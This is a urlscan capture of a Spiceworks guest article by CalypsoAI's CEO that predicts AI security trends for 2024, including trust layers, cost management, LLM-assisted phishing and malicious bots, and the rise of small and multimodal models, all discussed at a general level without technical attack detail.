www.spiceworks.com Open in urlscan Pro
45.60.15.212  Public Scan

URL: https://www.spiceworks.com/it-security/security-general/guest-article/all-eyes-on-the-intersection-of-risk-research-and-inn...
Submission: On March 05 via manual from SG — Scanned from SG

Form analysis 1 forms found in the DOM

<form role="form">
  <i class="mag-glass"></i>
  <input class="search-input" autocomplete="off" placeholder="Search Spiceworks" disabled="">
  <i class="clean-icon" style="display:none"></i>
  <div class="trending-topics"></div>
  <div class="search-box-results"></div>
</form>

Text Content

Skip to Main Navigation Skip to Main Content Skip to Footer
Home
 * News & Insights
   * News & Insights Home
   * Artificial Intelligence
   * Innovation
   * IT Careers & Skills
   * Cloud
   * Cyber Security
   * Future of Work
   * IT Research
   * All Categories
 * Community
   * Community Home
   * Cloud
   * Collaboration
   * Hardware
   * Networking
   * Programming
   * Security
   * Software
   * Storage
   * Vendors
   * Virtualization
   * Windows
   * All Categories
 * Events
 * IT Tools
   * Cloud Help Desk
   * Inventory Online
   * Contracts
   * Connectivity Dashboard
   * Pricing
   * All IT Tools
 * State of IT
 * Newsletters
 * Reviews


Login Join
Login Join




--------------------------------------------------------------------------------

Security General


ALL EYES ON THE INTERSECTION OF RISK, RESEARCH, AND INNOVATION THIS YEAR

Learn how Trust Layers defend against evolving threats, ensuring a secure AI
landscape.

Neil Serebryany Founder and Chief Executive Officer, CalypsoAI
February 16, 2024

--------------------------------------------------------------------------------




Key issues that have accompanied its meteoric popularity include the need for
robust AI security solutions, specifically data and access controls; cost
management for the deployment of AI-driven tools; a surge in cyberattacks using
large language models (LLMs); and the growing prominence of both multimodal
models and small models, says Neil Serebryany, founder and CEO of CalypsoAI.


AI’S REMARKABLE IMPACT ON INDUSTRIES AND SECURITY

Artificial intelligence (AI) is arguably the most disruptive and transformative
technology in a quarter-century rife with disruptive and transformative
technologies. AI-driven tools are changing the topography of the digital world,
introducing operational efficiencies across existing industries and creating new
industries, full stop. It will not be long before their use is as ubiquitous in
modern life as smartphones. 

As the enterprise landscape adapts to full engagement with AI-driven tools, such
as large language models (LLMs), and developers adapt the tools to fill needs
organizations don’t even know they have, their diffusion and acceptance will
reach certain milestones, each of which has significant corresponding security
repercussions. I believe a few milestones will be met in the coming year.


1. AS FOUNDATIONAL MODELS GROW, SO DOES THE NEED FOR HEIGHTENED AI SECURITY

Deploying LLMs and other AI-dependent tools across an organization
unquestionably brings efficiencies and innovation. Still, it also fosters tech
sprawl, an alarming diminishment of observability, and, eventually, flat-out
tech fatigue. All of these lead to an inadvertent laxity in organizational
security protocols, which renders the system vulnerable to AI-related novel
threats. These include prompt injections, data poisoning, and other adversarial
attacks against which traditional security infrastructure solutions are
helpless. Establishing a security perimeter that acts as a weightless “trust
layer” between the system in which the users operate and external models allows
security teams full visibility into and across all models on the system. This
gives them the agility to identify, analyze, and respond to threats in
real-time, protecting the system, the users, and the organization. 

While playing an important role in a defense-in-depth strategy, a model-agnostic
trust layer is more than just a defense. It can provide proactive, offensive
capabilities, such as policy-based access controls that regulate access to the
models and rate limits that deter large-volume prompt attacks intended to
overwhelm model operability. A trust layer can also support and enforce company
acceptable-use policies, ensure compliance with industry norms or government
regulations, prevent prompts containing proprietary data from being sent to the
model, and block model responses that contain malicious code. 


2. SECURITY SOLUTIONS PLAY A MAJOR ROLE IN COST DISCUSSION

As AI tools are increasingly integrated into daily operations across numerous
industries and domains, organizations must pivot to managing and optimizing the
costs and return on investment (ROI) of AI deployment at scale. Still, they must
do so with a security-first mindset. As the technology matures and organizations
move from experimentation or pilot phases into production-oriented deployments,
they face a growing need to justify associated costs and prove value while
considering the expanded attack surface. Production deployments often require
significant human resources, including data scientists and engineers, compute
resources, data at the outset, and maintenance, including retraining, to remain
relevant long-term. Understanding the costs, which include monitoring and
tracking model usage and efficiently allocating resources, enables organizations
to make informed decisions and hone their competitive edge while remaining
secure. 


3. THE FREQUENCY OF CYBERATTACKS USING LLMS IS RISING

Just as LLMs can be used to generate or refine legitimate content, such as
emails or source code, they can just as easily be used to generate that
content’s digital evil twins. Phishing emails, for example, have become so
sophisticated that they can accurately mimic a person’s writing style and
“voice,” including idiosyncrasies, which makes them exponentially more dangerous
in that the telltale signs of a fake are less discernible to the human eye.
Malicious code can be included in emails generated by LLMs and included in
responses to queries made to the models themselves; if a security solution is
not filtering for the specific language the code is written in, the code will
not trigger any quarantine actions and can infiltrate the system with ease.
Malicious commands to bypass controls or execute upon the user taking a standard
action can be buried in image and audio clips in chatbots that intentionally
invite or induce the user to take the action that will trigger the command. The
latest addition to the dark arts within AI is the emergence of “dark bots,” or
LLMs, developed specifically for malicious activity. These include WormGPT,
FraudGPT, and Masterkey, the latter of which has been trained on both successful
and unsuccessful prompt injections to enable it to create attacks customized for
the target model. This unchecked innovation can stretch the ability of security
teams to prevent breaches. 


4. SMALLER, MULTIMODAL MODELS RISE, BOOSTING THE NEED FOR RISK MANAGEMENT
SOLUTIONS

Large foundation models that began life as LLMs, such as ChatGPT, were unimodal
and text-based, generating human-like written content, including translations.
Now, just a little more than a year later, many large models, including ChatGPT,
are multimodal, meaning the input and/or the output can be different modalities,
such as text, audio, images, code, etc. These models are referred to as large
multimodal models (LMMs), multimodal large language models (MLLMs), and, more
often and more generically, generative AI (GenAI) models. Whatever they are
called, their ease of use, capacity for multi-channel creativity, and unlimited
potential are making them increasingly popular. But model development
innovations have also moved in the opposite direction to spawn a burgeoning
variety of small models that offer greater agility, focused utility, and more
transparency. As the quantity of resources it takes to create language models
decreases, organizations of all sizes develop in-house models trained on
proprietary data or deploy commercially developed small language models (SMLs),
such as Microsoft’s Orca2 or Google’s BERT Mini. 

See More: The Vulnerabilities of Traditional Patch Management 

However, any increase in model usage, irrespective of size or type—large, small,
multimodal, fine-tuned, or proprietary—expands the organization’s attack surface
and increases the organization’s risk exposure. Security solutions that can sync
up to accommodate the scope and scale of a newly expansive model environment are
critical tools to meet and defeat the threats. Trust-layer solutions,
particularly, will dominate that market.

We expect 2024 to be a pivotal year within the AI security space, with the
coming months full of breathless anticipation and wide-eyed wonder as research,
enterprise adoption, and AI risk trajectories continue to intersect in
unforeseen ways. 

How can AI security stay ahead? Why is a trust layer crucial for AI defense? Let
us know on FacebookOpens a new window , XOpens a new window , and LinkedInOpens
a new window . We’d love to hear from you!

Image Source: Shutterstock


MORE ON AI SECURITY

 * Effective AI Cybersecurity in 2024: Cross-Collaboration and Proactivity
 * How To Ethically Navigate AI And Biometrics in 2024?
 * The Value of Security Awareness Training & Simulated Phishing
 * Mitigating AI Risks: Protecting from Identity Theft, Deepfakes, and Fraud 



artificial intelligence Data Security

SHARE THIS ARTICLE:




Neil Serebryany

Founder and Chief Executive Officer, CalypsoAI

opens a new window opens a new window
opens a new window opens a new window

Neil Serebryany is the founder and Chief Executive Officer of CalypsoAI. Neil
has led industry-defining innovations throughout his career. Before founding
CalypsoAI, Neil was one of the world’s youngest venture capital investors at
Jump Investors. Neil has started and successfully managed several previous
ventures and conducted reinforcement learning research at the University of
South California. Neil has been awarded multiple patents in adversarial machine
learning.
Do you still have questions? Head over to the Spiceworks Community to find
answers.
Take me to Community


Popular Articles
Google Accounts Compromised by Hackers Without the Need for Passwords
Passwords: The End Is Coming
Experts Talk: Predicting the Cybersecurity Landscape in 2024




RECOMMENDED READS

Identity & Access Management


WHAT’S ON THE HORIZON FOR DIGITAL TRUST AND IDENTITY

Artificial Intelligence


HOW AI PARTNERSHIPS CAN EMPOWER TRADITIONAL BANKS?

Networking


DECODING MWC BARCELONA 2024: A YEAR OF CONNECTIVITY AND TRANSFORMATION

Innovation


MEET YOUR NEW INTERN: THE RISE OF AI-POWERED DIGITAL WORKERS

Artificial Intelligence


MLOPS TOOLS COMPARED: MLFLOW VS. CLEARML—WHICH ONE IS RIGHT FOR YOU?

Artificial Intelligence


WHY PRIORITIZING HUMAN ELEMENT IS CRUCIAL FOR SMART MANUFACTURING

spiceworks
 * About
 * Contact
 * Support
 * Advertise
 * Press / Media
 * Careers
 * Spiceworld
 * Blog
 * About Editorial
 * Follow on Facebook Follow on Linkedin

 * Sitemap
 * Privacy Policy
 * Terms of Use
 * Cookie Policy
 * Guidelines
 * Accessibility Statement
 * Do Not Sell my Personal Information

 * © Copyright 2006 - 2024 Spiceworks Inc.

Go to mobile version




YOUR PRIVACY IS IMPORTANT TO US.

We process your personal information to measure and improve our sites and
service, to assist our marketing campaigns and to provide personalised content
and advertising. For more information see ourPrivacy Policy
Accept Cookies
More Options